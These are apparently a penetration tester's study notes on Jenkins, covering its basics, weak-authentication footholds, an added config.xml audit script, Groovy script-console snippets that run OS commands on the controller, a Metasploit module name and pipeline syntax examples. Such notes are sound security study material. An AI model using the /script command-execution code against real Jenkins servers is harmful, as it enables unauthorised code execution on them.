Jenkins

Jenkins is an open-source automation server. It does not host code itself, but it can be connected to a Git server such as GitLab to run CI/CD workflows.

The biggest strength of Jenkins is its large plugin ecosystem, for instance plugins to visualize CI results (tests, coverage, ...).

Jenkins is written in Java, while Groovy is often used for plugins and for configuration files. It runs on Apache Tomcat.

Ports 🐲: 8080 (HTTP) and 5000 (Master/Slave communication).

Jenkins can be connected to a database or LDAP.


Jenkins Pentester Notes ☠️

attacking_common_applications jenkins_security

Useful reference: pwn_jenkins (1.7k ⭐).

Enumeration

  • Try to access the login page (/login)

Foothold

  • Some Jenkins instances don't have authentication
  • Some Jenkins instances may allow us to create accounts
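The two weak states above (no authentication, open self-registration) are visible in the controller's config.xml. The following audit script is an added example, not part of the original notes; the element and class names are the ones Jenkins writes in $JENKINS_HOME/config.xml, and the sample document is constructed for the demonstration.

```python
"""Audit a Jenkins config.xml for missing authentication, anonymous admin
grants and open sign-up. Added example; the sample XML below is constructed."""
import xml.etree.ElementTree as ET

UNSECURED = "hudson.security.AuthorizationStrategy$Unsecured"
LOCAL_REALM = "hudson.security.HudsonPrivateSecurityRealm"
ADMIN = "hudson.model.Hudson.Administer"


def audit_config(xml_text: str) -> list[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.findtext("useSecurity", "false").strip().lower() != "true":
        findings.append("security disabled: <useSecurity> is not true")
    strategy = root.find("authorizationStrategy")
    if strategy is not None:
        if strategy.get("class", "") == UNSECURED:
            findings.append("authorization strategy Unsecured: everyone is admin")
        # Matrix strategies store one <permission> per grant, written either
        # as "PERMISSION:sid" or (newer matrix-auth) "TYPE:PERMISSION:sid".
        for perm in strategy.iter("permission"):
            parts = (perm.text or "").strip().split(":")
            if len(parts) >= 2 and parts[-1] == "anonymous" and parts[-2] == ADMIN:
                findings.append("anonymous granted Overall/Administer")
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class") == LOCAL_REALM:
        if realm.findtext("disableSignup", "false").strip().lower() != "true":
            findings.append("self-registration enabled: <disableSignup> is not true")
    return findings


# Constructed sample: local accounts with sign-up open, plus a matrix grant
# handing Overall/Administer to anonymous.
SAMPLE = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:anonymous</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>"""

if __name__ == "__main__":
    for finding in audit_config(SAMPLE):
        print("FINDING:", finding)
```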

Exploitation

The /script endpoint (the script console) can be used to run Groovy code on the controller.

def command = "ls /"
def stdout = new StringBuffer(), stderr = new StringBuffer()
def process = command.execute()
process.consumeProcessOutput(stdout, stderr)
process.waitForOrKill(1000)
def exitCode = process.exitValue()
def output = stderr + stdout

println("Exit Code: ${exitCode}")
println("Output:\n${output}")

➡️ See also: revsh.groovy (0.1k ⭐).

Additional Notes For /script

Metasploit: exploit/multi/http/jenkins_script_console.

r = Runtime.getRuntime()
p = r.exec(["/bin/ls","-la"] as String[])
p.waitFor()
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

👻 To-do 👻

Stuff that I found, but never read/used yet.

  • master/slaves (a.k.a. workers)
  • freestyle projects (web interface) vs pipeline jobs (as code)
  • Jenkinsfile (groovy)
  • /var/lib/jenkins3/

Basic file

pipeline {
    agent any
    stages {
        stage('xxx') {
            steps {
                git 'https://github.com/example/my-java-app.git'
                git branch: env.BRANCH_NAME, url: 'URL'
                sh 'xxx'
            }
        }
    }
}

Add options

    options {
        buildDiscarder(logRotator(numToKeepStr: '10', daysToKeepStr: '7'))
    }

Poll SCM or webhooks to trigger a pipeline

    triggers {
        cron('H H(0-7) * * 1-5')
        webhook('')
    }

Artifacts are the output of the build

    post {
        always {
            junit '*.xml'
        }
        success {
            archiveArtifacts '*.xml'
        }
    }

Bonus

stage('xxx') {
    when {
        branch 'development'
    }
}

// https://plugins.jenkins.io/warnings-ng/
recordIssues(
    tools: [clangTidy(pattern: 'clang-tidy-report.txt')]
)